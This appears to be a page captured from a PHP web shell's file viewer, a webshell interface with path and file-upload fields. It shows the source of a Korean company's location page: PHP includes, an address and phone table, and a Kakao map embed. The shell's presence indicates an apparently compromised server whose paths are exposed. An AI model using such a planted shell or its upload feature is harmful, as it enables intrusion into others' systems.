MINI MINI MANI MO

Path : /home/lhcar/www/sub01/
File Upload :
Current File : /home/lhcar/www/sub01/road.php

<? include "$DOCUMENT_ROOT/inc/header.php";?>
<? include "$DOCUMENT_ROOT/inc/top.php";?>
<? include "$DOCUMENT_ROOT/inc/sub_vs01.php";?>


<section class="layout-contents">
    <div>
        <table class="table">
            <tr>
                <th><strong>주소</strong></th>
                <td >경기도 화성시 장안면 무봉길 166-55</td>
                </tr>
                <tr>
                <th ><strong>전화번호</strong></th>
                <td >031-366-2266 / 031-354-8904 </td>
                </tr>
                <tr>
                <th ><strong>팩스번호</strong></th>
                <td >031-354-1828 </td>
            </tr>
        </table>
    </div>

    <div class="map-wrap">
        <!-- * 카카오맵 - 지도퍼가기 -->
        <!-- 1. 지도 노드 -->
        <div id="daumRoughmapContainer1611820342014" class="root_daum_roughmap root_daum_roughmap_landing" style="width:100%"></div>

        <!--
            2. 설치 스크립트
            * 지도 퍼가기 서비스를 2개 이상 넣을 경우, 설치 스크립트는 하나만 삽입합니다.
        -->
        <script charset="UTF-8" class="daum_roughmap_loader_script" src="https://ssl.daumcdn.net/dmaps/map_js_init/roughmapLoader.js"></script>

        <!-- 3. 실행 스크립트 -->
        <script charset="UTF-8">
            new daum.roughmap.Lander({
                "timestamp" : "1611820342014",
                "key" : "246eu",
                // "mapWidth" : "1000",
                "mapHeight" : "500"
            }).render();
        </script>
    </div>

</section>

   

<? include "$DOCUMENT_ROOT/inc/bottom.php";?> 

OHA YOOOO